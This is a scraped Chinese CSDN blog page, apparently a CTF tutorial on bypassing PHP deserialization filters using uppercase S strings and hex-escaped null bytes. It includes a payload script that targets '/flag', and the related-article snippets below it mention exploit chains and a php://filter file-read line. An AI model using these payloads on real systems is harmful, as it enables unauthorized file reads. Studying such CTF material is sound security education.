PHP反序列化3(属性绕过)

最新推荐文章于 2024-11-25 10:34:23 发布
最新推荐文章于 2024-11-25 10:34:23 发布
阅读量576 收藏
点赞数 7
分类专栏: PHP反序列化 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81328699/article/details/142593932
版权

考点3:私有属性绕过+十六进制绕过

<aside> 💡

十六进制绕过

</aside>

大写 S模式下,字符可以用/和十六进制表示。%00即chr(0)就可以用\00表示。

<aside> 💡

部分例题

</aside>

 <?php

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;
............
............
............
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

构造payload:

<?php
class FileHandler {

   protected  $op = 2;
   protected  $filename = "/flag";
   protected  $content = "aaa";
}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

$a = new FileHandler();
$b = serialize($a);
$b=str_replace(chr(0), '\\00', $b);
$b=str_replace('s:5', 'S:5', $b);
$b=str_replace('s:11', 'S:11', $b);
$b=str_replace('s:10', 'S:10', $b);
echo $b;

【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 5777
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 1155
1、分析链条和属性   链条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
详解PHP反序列化漏洞
LYJ20010728的博客
05-23 2945
PHP反序列化学习序列化与反序列化定义常见使用情况常见的序列化格式反序列化中常见的魔术方法反序列化绕过protected和private绕过__wakeup绕过(CVE-2016-7124)引用利用16进制绕过字符过滤同名方法的利用绕过部分正则字符逃逸字符增多字符减少 序列化与反序列化 定义 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用; 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性; 常见的php
php3绕过,PHPB2B注入#3(绕过过滤)
weixin_39526415的博客
03-12 150
PHPB2B某处注入绕过过滤。官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip详细说明:1.注册企业会员。2.注册企业会员且通过审核。发布产品。漏洞文件。virtual-office/product.phpContent-Disposition: form-data; name="data[product][sort_id]"C...
php3绕过,PHPB2B注入#3(绕过过滤) | CN-SEC 中文网
weixin_32770541的博客
03-12 151
摘要PHPB2B某处注入绕过过滤。官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zipPHPB2B某处注入绕过过滤。官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip详细说明:1.注册企业会员。2.注册企业会员且通过审核。发布产品。漏洞文件。virtual-offi...
php3绕过,ecshop 2.7.3 /flow.php 登录绕过漏洞
weixin_39995351的博客
03-12 370
影响文件:flow.php188行开始elseif ($_REQUEST['step'] == 'login'){include_once('languages/'. $_CFG['lang']. '/user.php');/** 用户登录注册*/if ($_SERVER['REQUEST_METHOD'] == 'GET').....else{include_once('includes/li...
php其他反序列化知识学习
竹盐笙熙的博客
04-09 1268
简单总结最近学习的一些php反序列化知识
PHP反序列化
L0g1c的博客
10-22 1463
反序列是指把对象转换为字符串的过程,便于在内存、文件、数据库中保存、传输,PHP中使用serialize函数进行序列化。 运行结果为 各个字符的意义:字母O代表Object,a代表array,s代表string,i 表示数字 O代表Object对象,6代表类名(Person)的长度是6,3代表类中的属性3个。{}内就是类的属性信息,每个属性以分号;结束。 s代表string类型,4代表属性(name)的长度,name后面是属性值,string类型,数值长度为3,数值为php。若类属性值未初始化,则默认值
渗透测试-PHP反序列化绕过
cdyunaq的博客
04-26 4625
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1786
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
PHP反序列化漏洞解析
weixin_43749601的博客
10-31 774
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; //%00*%00属性名 protected $filename; protected $content; function __construct() { //该方法在创建对象时自动调用 $op = "1"; $filename = "/tmp/tm
2020网鼎杯(青龙组)--WEB--AreUSerialz(反序列化
a965527596的博客
05-17 2505
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
浅谈PHP反序列化漏洞【一】
weixin_39664643的博客
04-15 321
浅谈PHP反序列化漏洞 0x00.前置知识 PHP大佬请跳至0x01.PHP反序列化漏洞 序列化 PHP程序为了保存和转储对象,提供了序列化的方法,PHP序列化是为了在程序运行的过程中对对象进行转储而产生的。在序列化期间,对象将当前状态写入到临时或持久性存储区。 序列化:将对象转换成字符串。利用函数serialize()实现 反序列化:将序列化后的字符串转换为对象。利用函数unserialize()实现 new一个对象将其实例化,了解序列化后字符串的格式 <?php class Nets {
protected反序列化特点
qq_48511129的博客
12-13 1169
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel
2020网鼎杯青龙组writeup
st0ut的博客
05-25 888
前言 网鼎杯第一场开始了,又是菜鸡自闭的一天。。。 刚开始一直不放web题,让做web的有点难受呀。 web AreUSerialz 打开题目发现源码,是一个反序列化: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __constr
PHP封装成类(文件上传)
zhimab的博客
07-23 2768
<?php /** * Created by PhpStorm. * User: huang * Date: 2017/7/19 * Time: 23:20 */header("content-type:text/html;charset=utf-8");$new = new upload();class upload{ protected $fileName; protected $fileIn
网鼎杯 AreUSerialz反序列化题目
god_Zeo的安全博客
05-11 1051
看了网鼎杯 AreUSerialz反序列化题目wp 对php反序列化又有了学到了新的知识点,之前都没注意到 标题题目是这样的: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
php反序列化saber
最新发布
01-25
### PHP 反序列化中的 Saber 库使用方法及其安全风险 #### 背景介绍 PHP反序列化功能允许对象状态被保存并恢复。然而,如果处理不当,这可能成为严重的安全隐患。特别是当恶意用户能够控制输入数据时,可能会触发特定的对象属性或方法调用来执行任意代码。 #### 关于 `Saber` 类的分析 在给定的例子中提到一个名为 `Saber` 的类[^1]。此名称暗示该组件可能是某个应用程序的一部分或者是开发者自定义的一个类名。通常情况下,在 PHP 中创建可序列化的对象需要实现两个特殊的方法: - `__wakeup()` 方法则会在成功完成 unserialization 后立即自动运行一次; 对于 `Saber` 这样的类来说,可能存在如下结构: ```php class Saber { public $weapon; function __construct($weapon){ $this->weapon = $weapon; } // 当对象被反序列化时会调用这个函数 public function __wakeup(){ include($this->weapon); // 危险操作:直接包含了 weapon 属性指定的内容作为文件路径 } } ``` 上述代码片段展示了如何通过设置 `$weapon` 来影响 `include` 函数的行为。由于这里没有对传入的数据做任何验证就将其传递给了 `include` ,这就构成了潜在的安全威胁——即可以通过精心设计的 payload 实现远程命令注入攻击。 #### 利用链解析 根据提供的利用链条描述,可以看到整个过程涉及多个类之间的相互作用: - **summon**: 创建了一个包含其他复杂嵌套对象实例的对象图。 - **artifact & prepare**: 继续构建更深层次的对象关系网直至最终目标——`saber` 对象。 - **pseudo protocol (伪协议)**: 使用特殊的 URI 方案 (`php://`) 加载外部资源,并结合 base64 编码绕过某些过滤机制来读取服务器端敏感文件内容。 这种复杂的组合使得即使是在看似简单的变量赋值语句背后也可能隐藏着危险的操作[^2]: ```php $s->weapon="php://filter/convert.base64-encode/resource=flag.php"; ``` 这段代码实际上指示 PHP 去加载并编码位于当前目录下的 `flag.php` 文件,而这一切都是由之前一系列经过巧妙安排的对象初始化所引发的结果。 #### 防范措施建议 为了避免此类漏洞的发生,应当遵循以下最佳实践原则: - 尽量减少不必要的序列化逻辑; - 如果确实需要用到,则务必确保只信任来自可靠源的数据流; - 在反序列化前后都应仔细审查所有相关联的对象成员以及它们之间交互的方式; - 特别注意那些可以间接引起 I/O 或者网络请求的动作(比如这里的 `include`),并对这些地方加强防护; - 定期更新依赖库版本至最新稳定版以获得官方发布的修复补丁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值